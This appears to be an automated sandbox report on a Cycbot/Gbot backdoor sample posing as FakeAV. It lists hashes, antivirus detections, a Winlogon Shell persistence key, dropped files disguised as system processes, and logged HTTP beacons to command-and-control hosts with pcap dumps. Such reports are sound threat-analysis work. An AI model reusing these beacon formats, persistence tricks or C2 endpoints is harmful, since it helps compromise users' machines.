Analysis Date2014-11-28 10:18:18
MD5c2a0484256977f4d9d29a84e77b44fca
SHA1dcb79290a714b2b0e39c1426370caffa6edcab3a

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 85b5beedabbb7fb5276989d8031de8a8 sha1: b8f560c59eea4b58f8722f4d1037faa5d2dca965 size: 60928
Section.rdata md5: c5d4ea4186518a9204dcc070425a0fe2 sha1: 35b73bad002d952e2e6be29ff35fa1b0f4ee6c7c size: 2048
Section.data md5: fd83ad91107c18a1da5ba6323476279a sha1: 68cd0021854555a4f7207e3403c72ea499688c17 size: 48640
Section.rsrc md5: b6a4b5f267ada79a6e5cbccc0986e862 sha1: f6a4941c5320d799a39d51ca11ca24168751417d size: 1024
Timestamp2005-10-03 01:54:43
VersionLegalCopyright: Copyright (C) 2010
ProductVersion: 1, 0, 0, 2
PrivateBuild: 1121
FileVersion: 1, 0, 0, 2
FileDescription: MS Shell
PEhashfd35b870d5346181c011930fded0d04637c2967e
IMPhash61650c5eb213852aa7cdf244ca36c5d0
AV360 SafeGen:Heur.Conjar.9
AVAd-AwareGen:Heur.Conjar.9
AVAlwil (avast)MalOb-IJ [Cryp]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.A.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen
AVBullGuardGen:Heur.Conjar.9
AVCA (E-Trust Ino)Win32/FakeAV.S!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWIN.Trojan.Agent-1506
AVDr. WebTrojan.Siggen2.7324
AVEmsisoftGen:Heur.Conjar.9
AVEset (nod32)Win32/Kryptik.HVW
AVFortinetW32/FakeAV.BZD!tr
AVFrisk (f-prot)W32/Goolbot.A.gen!Eldorado
AVF-SecureGen:Heur.Conjar.9
AVGrisoft (avg)Cryptic.BFI
AVIkarusTrojan.Win32.FakeAV
AVK7Backdoor ( 003210941 )
AVKasperskyPacked.Win32.Krap.hy
AVMalwareBytesBackdoor.Gbot
AVMcafeeBackDoor-EXI
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Heur.Conjar.9
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecTrojan.FakeAV!gen39
AVTrend MicroBKDR_CYBOT.SMA
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutex{655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNSwww.google.com
Winsock DNSxinmin.cn
Winsock DNS127.0.0.1
Winsock DNScheckserverstatux.com
Winsock DNSwhysohardx.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe

Network Details:

DNSwww.google.com
Type: A
173.194.125.52
DNSwww.google.com
Type: A
173.194.125.48
DNSwww.google.com
Type: A
173.194.125.49
DNSwww.google.com
Type: A
173.194.125.50
DNSwww.google.com
Type: A
173.194.125.51
DNSprotectyourpc-11.com
Type: A
74.200.250.181
DNSxinmin.cn
Type: A
222.73.115.218
DNScheckserverstatux.com
Type: A
DNSwhysohardx.com
Type: A
HTTP GEThttp://www.google.com/
User-Agent:
HTTP GEThttp://www.google.com/
User-Agent:
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=main&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GEThttp://xinmin.cn/2010/10/10/20101010095345843724.jpg?tq=gHZutDyMv5rJejPia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: gbot/2.3
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err084&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err095_2_7&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1032 ➝ 173.194.125.52:80
Flows TCP192.168.1.1:1033 ➝ 173.194.125.52:80
Flows TCP192.168.1.1:1034 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1035 ➝ 222.73.115.218:80
Flows TCP192.168.1.1:1036 ➝ 74.200.250.181:80
Flows TCP192.168.1.1:1037 ➝ 74.200.250.181:80

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a                      */*....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a                      */*....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d6d 61696e26 6e3d3026   status=main&n=0&
0x00000070 (00112)   65787472 613d3020 48545450 2f312e31   extra=0 HTTP/1.1
0x00000080 (00128)   0d0a486f 73743a20 70726f74 65637479   ..Host: protecty
0x00000090 (00144)   6f757270 632d3131 2e636f6d 0d0a5573   ourpc-11.com..Us
0x000000a0 (00160)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x000000b0 (00176)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x000000c0 (00192)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x000000d0 (00208)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x000000e0 (00224)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x000000f0 (00240)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000100 (00256)   73650d0a 0d0a                         se....

0x00000000 (00000)   47455420 2f323031 302f3130 2f31302f   GET /2010/10/10/
0x00000010 (00016)   32303130 31303130 30393533 34353834   2010101009534584
0x00000020 (00032)   33373234 2e6a7067 3f74713d 67485a75   3724.jpg?tq=gHZu
0x00000030 (00048)   7444794d 7635724a 656a5069 61396e72   tDyMv5rJejPia9nr
0x00000040 (00064)   6d736c36 6769577a 2532424a 5a625679   msl6giWz%2BJZbVy
0x00000050 (00080)   41253344 20485454 502f312e 300d0a43   A%3D HTTP/1.0..C
0x00000060 (00096)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000070 (00112)   0d0a486f 73743a20 78696e6d 696e2e63   ..Host: xinmin.c
0x00000080 (00128)   6e0d0a41 63636570 743a202a 2f2a0d0a   n..Accept: */*..
0x00000090 (00144)   55736572 2d416765 6e743a20 67626f74   User-Agent: gbot
0x000000a0 (00160)   2f322e33 0d0a0d0a 3a204d6f 7a696c6c   /2.3....: Mozill
0x000000b0 (00176)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x000000c0 (00192)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x000000d0 (00208)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x000000e0 (00224)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x000000f0 (00240)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000100 (00256)   73650d0a 0d0a                         se....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 34266e3d   status=err084&n=
0x00000070 (00112)   30266578 7472613d 30204854 54502f31   0&extra=0 HTTP/1
0x00000080 (00128)   2e310d0a 486f7374 3a207072 6f746563   .1..Host: protec
0x00000090 (00144)   74796f75 7270632d 31312e63 6f6d0d0a   tyourpc-11.com..
0x000000a0 (00160)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x000000b0 (00176)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x000000c0 (00192)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x000000d0 (00208)   696e646f 7773204e 5420352e 31290d0a   indows NT 5.1)..
0x000000e0 (00224)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000f0 (00240)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000100 (00256)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 355f325f   status=err095_2_
0x00000070 (00112)   37266e3d 30266578 7472613d 30204854   7&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
.x.
..
..
3.
S.
040904b0
1, 0, 0, 2
1121
Copyright (C) 2010
FileDescription
FileVersion
LegalCopyright
&Main
MS Sans Serif
MS Shell
PrivateBuild
ProductVersion
S&top
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
||20}7_jo2?
2/78$e,H
2y/rth
3Lh?r%
* 3Q^O
6j>YT@
6NL_M&
777TTF
81@yQdA	~
9&C?q8
+9I~$/\
9rN2<b
9>*~	y
agS)TD*9M
!aH#)>
a/P3PJ
=>bf}w
B&OCZ H
+b_p{$
:C$"0d
cG[6TK
CloseHandle
~<c]ML|K;uu
CreateDirectoryW
CreateFileW
CRYPT32.dll
CryptEncodeObject
CryptEncodeObjectEx
CryptEnumOIDInfo
C#Ue^0f
@.data
DDRAW.dll
%.D\dW)
DecodePointer
DeleteFileW
DirectDrawCreateClipper
_D:RiP
dwZ$,t
e9Q(?R
}E:fdT
*eiB"z
EnpKzs
EnumUILanguagesW
?<eq6<
ExitProcess
ExpandEnvironmentStringsW
=F^/r~
FreeLibrary
]g1ttS
{gDF-3kBE
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetModuleFileNameW
GetModuleHandleA
GetModuleHandleW
GetProcAddress
GetProcessVersion
GetSystemTimeAsFileTime
GetTickCount
GetVersionExA
hhlAll
hhLibrh
hLocah
hThoo@
hVh4J@
 ^)*	i
I_M7*Y
InterlockedCompareExchange
InterlockedExchange
'/i.v"
,iV*?:
]J70+X
'`~j9Z
jjj6{1o{
K}0)I!
#k4/og
KERNEL32.dll
kljI~^
l$8C0V
l/h>JA
?=LLL:
LoadLibraryExW
LoadLibraryW
LocalAlloc
LocalFree
lstrcmpW
lstrlenW
L\X?H5:
lZ(LL.
M(hJC@
=.mi\U
MoveFileW
mPU,>4D
{MXPjh
m xxzF
nhhSlee
ntdll.dll
@.-O=:
-`OKvm
OpenEventW
PathFileExistsW
PathFindFileNameW
Pe(4Lvyr'
p^klP&]
P</+P^~]
PP$;~F
pqRw]H
pWJa4;
PxPyo#
QueryPerformanceCounter
Qz=~f	
R3j,eyq
)r&81N
`.rdata
rgw(3~w
r(h9C@
Rh/VxrX
'~r;~r
RtlUnwind
SetConsoleMode
SetUnhandledExceptionFilter
SHELL32.dll
SHGetFolderPathAndSubDirW
SHLWAPI.dll
SHSetLocalizedName
SIM7i/
sKiiOB
StrCmpNW
StrStrW
SU_#JQ
t1(h[F@
&TDe\~2
}t#E#'
TerminateProcess
!This program cannot be run in DOS mode.
ThlFre
]ThLoad
Throte
tp(2o2
T$w^ia%
U@.39>%
u%|dzY
u$h[c@
u$h!Q@
ulG<&"f
>UmO.]5
UnhandledExceptionFilter
U"PDh|`
.$uRmq
;]UYJ(
=VO`9]DS?zl
VVR@~TZX<
W8b@be
WaitForSingleObject
wD|fw+
=wH8/D
Wl[.QM
WriteFile
w,r/w<T>w
X{6?CE
x75A4Rg
xBkHV{}
x)"PP~
Y<+f>U
Y =gpo-
y i:?J
yP44<P
%y#.s3
Z&mv[F
zQ5?0$
Z.Yr<E